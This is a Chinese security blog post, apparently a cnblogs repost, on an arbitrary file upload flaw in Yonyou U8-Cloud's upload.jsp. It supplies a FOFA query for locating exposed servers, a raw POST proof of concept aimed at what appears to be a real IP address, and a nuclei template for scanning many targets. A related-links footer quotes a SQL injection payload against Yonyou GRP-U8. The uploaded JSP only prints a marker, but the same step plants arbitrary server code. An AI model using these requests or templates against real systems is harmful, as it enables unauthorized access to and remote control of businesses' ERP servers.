首页 > 其他分享 >用友U8-Cloud upload.jsp 任意文件上传漏洞

用友U8-Cloud upload.jsp 任意文件上传漏洞

时间:2023-10-28 10:22:06浏览次数:36  
标签:U8 用友 upload 漏洞 jsp 上传

漏洞简介

U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。
该系统upload.jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器

漏洞复现

fofa语法:app="用友-U8-Cloud"
登录页面如下:

POC:

POST /linux/pages/upload.jsp HTTP/1.1
Host: 139.159.230.125:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
filename: hack.jsp
Content-Length: 56


<% out.println("The website has vulnerabilities!!");%>


访问上传后的文件http://ip:port/linux/hack.jsp

nuclei批量yaml文件

id: yonyou_U8Cloud_upload
info:
  name: 用友U8-Cloud upload.jsp 任意文件上传漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: upload
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.jsp"
requests:
  - raw:
      - |-
        POST /linux/pages/upload.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        filename: {{file_name}}
        Content-Length: 56


        <% out.println("The website has vulnerabilities!!");%>
      - |-
        GET /linux/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    req-condition: true
    matchers:
      - type: dsl
        condition: and
        dsl:
          - 'contains((body_2), "The website has vulnerabilities!!") && status_code_2 == 200'

标签:U8,用友,upload,漏洞,jsp,上传
From: https://www.cnblogs.com/pursue-security/p/17793738.html

相关文章

  • php结合webuploader断点续传的实现
    最近公司项目需要用到断点续传,所以记录一下其中的坑使用到的主要技术webuploaderthinkphp5断点续传的思路:客户端:   1.获取文件md5(MD5是文件唯一标识,用来判断是否存在此文件,并且用作分片的文件夹名)   2.将文件分片   3.验证分片是否上传过,上传过直接跳......
  • php结合web uploader插件实现分片上传文件
    这篇文章主要为大家详细介绍了php结合webuploader插件实现分片上传文件,采用大文件分片并发上传,极大的提高了文件上传效率,感兴趣的小伙伴们可以参考一下 最近研究了下大文件上传的方法,找到了webuploaderjs插件进行大文件上传,大家也可以参考这篇文章进行学习:《WebUploader......
  • jsp
    1.jsp表达式<%=  %> 等价于  ${}  就相当于输出  2.jsp的脚本片段  <%  %> 3.jsp声明 <%!  %>  4.jsp指令这两个都是一样: header和footer的内容放在网页主体的上下部分 9大内置对象主要用的4个  存东西取...转发......
  • odoo fileupload via controller
      #-*-coding:utf-8-*-#PartofOdoo.SeeLICENSEfileforfullcopyrightandlicensingdetails.importbase64fromcollectionsimportOrderedDictfromdatetimeimportdatetimefromodooimporthttpfromodoo.exceptionsimportAccessError,Missin......
  • springboot 整合 gridfs 、webUploader实现大文件分块上传、断点续传、秒传
    主要的pom.xml:<dependency>      <groupId>mysql</groupId>      <artifactId>mysql-connector-java</artifactId>    </dependency><!--mongodb-->    <dependency>      <groupId>org.spri......
  • 23.10.24(jsp下拉框添加默认值)
    通过查阅网上资料,得到jsp下拉框默认值的设置方式:<selectname="zy"id="zy"required><optionvalue="0"></option><optionvalue="信息工程"<%=selectValue.equals("信息工程")?"selected&......
  • java项目实践-jsp-finter-监听器-day19
    目录1.jsp2.过滤器3.listener监听器1.jspservle逻辑处理方便html页面表现麻烦jsp页面表现方便但是逻辑处理麻烦JSP是一种页面技术JSP本质上是servlet类通过JSP引擎翻译成servletjsp约等于java+html注意:jsp不是访问静态的html文件index.jsp修改成如下代码:<%-......
  • ElementUI——el-upload上传前校验图片宽高
    前言总要写点东西吧,最近忙于项目,github上的问题也没处理,博客也没咋写,自媒体上的东西也没咋发,随手记录一下当前项目改造时候遇到的问题吧;内容before-upload借助于:before-upload来进行校验,使用FileReader和Image来获取宽高constreader=newFileReader()reader.onload......
  • 用友时空KSOA dept.jsp SQL注入漏洞
    漏洞简介用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。系统dep......
  • 用友GPR-U8 slbmbygr SQL注入漏洞
    漏洞简介用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8SQL注入漏洞。漏洞复现fofa语法:app="用友-GRP-U8"登录页面如下:POC:/u8qx/slbmbygr.jsp?gsdm=1';WAITFORDELAY'0:0:5'--sqlmap梭哈nuclei批量yaml文件id:yonyou_GRPU8_slb......